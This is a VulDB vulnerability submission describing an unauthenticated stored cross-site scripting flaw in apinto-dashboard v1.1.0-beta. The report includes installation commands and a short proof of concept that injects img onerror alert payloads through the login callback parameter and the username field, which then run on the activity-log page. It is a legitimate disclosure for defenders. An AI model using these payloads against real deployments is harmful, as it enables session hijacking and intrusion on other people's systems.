Invia #50338: Unauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, usernameinformazioni

TitoloUnauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, username
Descrizione# Get start repo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` # Unauthenticated Stored XSS While user loging, the wrong user name and callback parameter will be recorded in the activity log, but the output parameters are not escaped correctly, external attacker can inject arbitrary js code. poc: open /login?callback=/<img src=1 onerror=alert(/2nd-xss/)> enter `<img src=1 onerror=alert(/1st-xss/)>` at the username ![](https://c2.im5i.com/2022/11/01/XrTL4.png) ![](https://c2.im5i.com/2022/11/01/XrXvW.png) then open /activity-log ![](https://c2.im5i.com/2022/11/01/Xrjjd.png) ![](https://c2.im5i.com/2022/11/01/XrHKR.png)
Utente
 Tomy (UID 34751)
Sottomissione01/11/2022 11:54 (4 anni fa)
Moderazione01/11/2022 16:50 (5 hours later)
StatoAccettato
Voce VulDB212640 [eolinker apinto-dashboard /login callback cross site scripting]
Punti17

PrecedenteVisione D'ensembleIl prossimo

Do you know our Splunk app?

Download it now for free!